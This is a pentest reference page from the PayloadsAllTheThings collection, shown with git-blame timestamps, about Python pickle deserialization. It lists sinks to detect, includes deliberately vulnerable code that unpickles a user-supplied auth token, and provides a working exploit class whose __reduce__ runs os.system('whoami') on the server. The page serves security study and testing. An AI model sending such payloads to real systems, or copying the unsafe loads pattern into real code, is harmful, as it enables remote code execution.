PayloadsAllTheThings/Insecure Deserialization/Python.md

70 lines
2.0 KiB
Markdown
Raw Normal View History

2018-11-27 22:04:17 +00:00
# Python Deserialization
> Python deserialization is the process of reconstructing Python objects from serialized data, commonly done using formats like JSON, pickle, or YAML. The pickle module is a frequently used tool for this in Python, as it can serialize and deserialize complex Python objects, including custom classes.
## Summary
* [Detection](#detection)
* [Pickle](#pickle)
* [References](#references)
## Detection
In Python source code, look for these sinks:
* `cPickle.loads`
* `pickle.loads`
* `_pickle.loads`
* `jsonpickle.decode`
2022-11-03 20:31:50 +00:00
2018-11-27 22:04:17 +00:00
## Pickle
The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object.
2022-04-18 18:58:14 +00:00
:warning: `import cPickle` will only work on Python 2
2018-11-27 22:04:17 +00:00
```python
import cPickle
from base64 import b64encode, b64decode
class User:
def __init__(self):
self.username = "anonymous"
self.password = "anonymous"
self.rank = "guest"
h = User()
auth_token = b64encode(cPickle.dumps(h))
print("Your Auth Token : {}").format(auth_token)
```
The vulnerability is introduced when a token is loaded from an user input.
```python
new_token = raw_input("New Auth Token : ")
token = cPickle.loads(b64decode(new_token))
print "Welcome {}".format(token.username)
```
Python 2.7 documentation clearly states Pickle should never be used with untrusted sources. Let's create a malicious data that will execute arbitrary code on the server.
> The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
```python
2022-03-24 06:09:34 +00:00
import cPickle, os
2018-11-27 22:04:17 +00:00
from base64 import b64encode, b64decode
class Evil(object):
def __reduce__(self):
return (os.system,("whoami",))
e = Evil()
evil_token = b64encode(cPickle.dumps(e))
print("Your Evil Token : {}").format(evil_token)
```
2018-12-24 14:02:50 +00:00
## References
2018-11-27 22:04:17 +00:00
- [Exploiting misuse of Python's "pickle" - Nelson Elhage - March 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)